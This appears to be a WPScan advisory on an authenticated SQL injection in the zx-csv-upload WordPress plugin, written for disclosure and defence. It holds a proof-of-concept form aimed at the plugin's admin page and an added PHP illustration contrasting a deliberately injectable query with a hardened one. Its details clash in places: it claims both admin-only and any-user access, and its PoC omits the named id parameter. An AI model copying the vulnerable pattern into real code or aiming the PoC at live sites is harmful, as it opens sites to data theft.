ZX_CSV Upload 1 – Authenticated SQL Injection


Description
Required user access: admin user.

$_GET['id'] is not escaped before being used in a SQL query. The URL is accessible to every registered user.
Proof of Concept
1 - Log in as an admin user.

2 - Send the following POST request (submit this form against the plugin's admin page):

<form action="http://www.example.com/wp-admin/admin.php?page=zx_csv_plugin_home" method="post">
    <input type="text" name="rsltsbmt" value="a">
    <input type="text" name="table_select" value="wp_terms">
    <input type="text" name="rsltfrom" value="0">
    <input type="text" name="rsltto" value="10">
    <input type="submit" name="">
</form>
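To show the defect class from the defensive side, the following PHP sketch is an added illustration and is not code from the zx-csv-upload plugin. It contrasts the unsafe pattern the advisory describes (request input concatenated into SQL, CWE-89) with a hardened handler for the same parameters. The function names, the nonce action `zx_example_query`, and the table allow-list are assumptions for the example.

```php
<?php
// Added illustration, not the plugin's own code. Both functions expect the
// global WordPress $wpdb object to be passed in.

// --- Vulnerable pattern (hypothetical) ---
function zx_example_vulnerable_query( $wpdb ) {
    // Unescaped request values flow straight into the query string, so a
    // crafted value in either parameter changes the SQL that is executed.
    $table = $_POST['table_select'];
    $id    = $_GET['id'];
    $sql   = "SELECT * FROM $table WHERE term_id = $id";
    return $wpdb->get_results( $sql );
}

// --- Hardened pattern (hypothetical) ---
function zx_example_safe_query( $wpdb ) {
    // 1. Only administrators may reach the handler, and the form must carry a
    //    nonce so it cannot be submitted cross-site on an admin's behalf.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    check_admin_referer( 'zx_example_query' ); // nonce action is an assumption

    // 2. Identifiers cannot be bound as placeholders, so the table name is
    //    restricted to a fixed allow-list that also names each table's id column.
    $allowed_tables = array(
        $wpdb->terms => 'term_id',
        $wpdb->posts => 'ID',
    );
    $table = isset( $_POST['table_select'] )
        ? sanitize_text_field( wp_unslash( $_POST['table_select'] ) )
        : '';
    if ( ! array_key_exists( $table, $allowed_tables ) ) {
        wp_die( 'Unknown table.' );
    }
    $id_column = $allowed_tables[ $table ];

    // 3. Numeric inputs are cast to non-negative integers and bound through
    //    $wpdb->prepare(); the range values from the form become a LIMIT clause.
    $id    = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
    $from  = isset( $_POST['rsltfrom'] ) ? absint( $_POST['rsltfrom'] ) : 0;
    $to    = isset( $_POST['rsltto'] ) ? absint( $_POST['rsltto'] ) : 10;
    $count = max( 0, $to - $from );

    $sql = $wpdb->prepare(
        "SELECT * FROM `{$table}` WHERE `{$id_column}` = %d LIMIT %d, %d",
        $id,
        $from,
        $count
    );
    return $wpdb->get_results( $sql );
}
```

The allow-list is the important part for the `table_select` parameter: `$wpdb->prepare()` only protects values, so a table or column name taken from the request has to be matched against a fixed set before it is interpolated. The capability check and nonce address the second half of the advisory, where the page is reachable by any registered user.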

Affects

Plugin zx-csv-upload

References

URL http://lenonleite.com.br/en/blog/2016/12/16/english-zx_csv-upload-1-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 72
Verified Yes
WPVDB ID 8702

Timeline

Publicly Published 2016-12-12
Added 2016-12-20
Last Updated 2016-12-20

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.